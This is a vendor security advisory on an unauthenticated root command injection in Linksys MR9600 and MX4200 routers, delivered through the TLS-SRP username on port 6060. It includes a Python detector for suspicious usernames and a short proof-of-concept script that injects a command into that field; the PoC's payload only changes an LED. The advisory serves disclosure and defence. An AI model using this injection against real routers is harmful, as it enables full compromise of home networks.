Advisory ID:               SYSS-2025-010
Product:                   MR9600, MX4200 (and potentially others)
Manufacturer:              Linksys
Affected Version(s):       1.0.4.205530 for MR9600,
                           1.0.13.210200 for MX4200
                           (and potentially others)
Tested Version(s):         1.0.4.205530 for MR9600,
                           1.0.13.210200 for MX4200
Vulnerability Type:        OS Command Injection (CWE-78)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2025-03-18
Solution Date:             -
Public Disclosure:         2026-02-12
CVE Reference:             CVE-2026-27848
Author of Advisory:        Christian Zäske, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

Linksys MX4200 is a Wi-Fi mesh router targeting home users.

The manufacturer describes the product as follows (see [1]):

"This router supports the latest Wi-Fi® 6 (802.11ax) standard for
next-level streaming and gaming. Its powerful WiFi 6 mesh coverage
offers faster WiFi performance for lag-free online gaming and
simultaneous streaming to every device and corner of your home."

Due to missing neutralization of special elements, OS commands can be
injected via the handshake of a TLS-SRP connection. These commands are
ultimately run as the root user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The Linksys MR9600 (and other models) provides a service (sct_server
binary) running on TCP port 6060 (all interfaces except WAN), which is
used to integrate other mesh devices into the network.

The service accepts TLS-SRP connections with a username and password.
The service uses a different script (smcdb_auth) to receive credential
information using the given username.

Since the service does not neutralize special elements and appends the
username as a command line argument, arbitrary OS commands can be
injected via the username of the TLS-SRP handshake. These commands are
run as the root user without the need for a valid username or password.

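Added example (not part of the SySS advisory and not Linksys code): the
SRP username travels unencrypted in the TLS ClientHello (RFC 5054,
extension type 12), so a sensor on the LAN can flag connections to TCP
port 6060 whose username is anything other than a plain identifier. The
allowlist pattern, the function names and the sample bytes are
assumptions constructed for illustration, and the input is assumed to be
one complete, reassembled TLS record.

```python
import re
import struct

SRP_EXT = 12  # RFC 5054 "srp" ClientHello extension type
# Assumption: legitimate identities are short and use only these characters.
SAFE_IDENTITY = re.compile(rb"[A-Za-z0-9._@-]{1,64}")

def srp_identity(record: bytes):
    """Return the SRP username carried in a TLS ClientHello record, or None."""
    try:
        if record[0] != 22 or record[5] != 1:   # handshake record, ClientHello
            return None
        pos = 5 + 4 + 2 + 32                    # record hdr, hs hdr, version, random
        pos += 1 + record[pos]                  # skip session_id
        pos += 2 + struct.unpack_from(">H", record, pos)[0]  # skip cipher_suites
        pos += 1 + record[pos]                  # skip compression_methods
        end = pos + 2 + struct.unpack_from(">H", record, pos)[0]
        pos += 2
        while pos + 4 <= min(end, len(record)):
            ext_type, ext_len = struct.unpack_from(">HH", record, pos)
            body = record[pos + 4:pos + 4 + ext_len]
            if ext_type == SRP_EXT and body:
                return body[1:1 + body[0]]      # srp_I<1..2^8-1>: length byte + name
            pos += 4 + ext_len
    except (IndexError, struct.error):
        pass                                    # truncated or malformed hello
    return None

def is_suspicious(record: bytes) -> bool:
    """True if an SRP username is present and falls outside the allowlist."""
    ident = srp_identity(record)
    return ident is not None and SAFE_IDENTITY.fullmatch(ident) is None

def sample_hello(identity: bytes) -> bytes:
    """Constructed test input: minimal ClientHello with only the SRP extension."""
    ext = struct.pack(">HHB", SRP_EXT, len(identity) + 1, len(identity)) + identity
    body = (b"\x03\x03" + bytes(32) + b"\x00" + b"\x00\x02\xc0\x1d" + b"\x01\x00"
            + struct.pack(">H", len(ext)) + ext)
    hs = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + struct.pack(">H", len(hs)) + hs
```

A hello without the SRP extension, or one that is truncated, yields None
and is not flagged; an empty username is flagged because RFC 5054
requires at least one byte.
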
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the "tlslite-ng" library, the following Python code will result in
the LED indicator at the top turning yellow, indicating that the OS
command was successfully executed. No valid username or password is
needed.

    import socket
    from tlslite.api import *

    # Plain TCP connection to the sct_server service on the router
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(("192.168.1.1", 6060))
    conn = TLSConnection(sock)
    # The first argument is the SRP username, which the service appends
    # to a command line without neutralization
    conn.handshakeClientSRP("; . /etc/led/lib_nodes_hw.sh; combo_solid yellow on;", "dummypass")

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

There is no known solution yet.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-11-11: Vulnerability discovered
2025-03-18: Vulnerability reported to manufacturer
2025-04-07: First response from manufacturer
2025-04-14: Requested an update from manufacturer
2025-05-06: Acknowledgment of vulnerabilities by the manufacturer
2026-02-12: Public disclosure

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for Linksys MX4200
    https://support.linksys.com/kb/article/952-en/
[2] SySS Security Advisory SYSS-2025-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2025-010.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Christian Zäske of SySS GmbH.

E-Mail: christian.zaeske@syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Christian_Zaeske.asc
Key ID: 0x7B00D164A32F9AC9
Key Fingerprint: 51D4 6E9B 3C29 7347 AC01 0F5A 7B00 D164 A32F 9AC9

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind.
Details of this security advisory may be updated in order to provide as
accurate information as possible. The latest version of this security
advisory is available on the SySS website.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en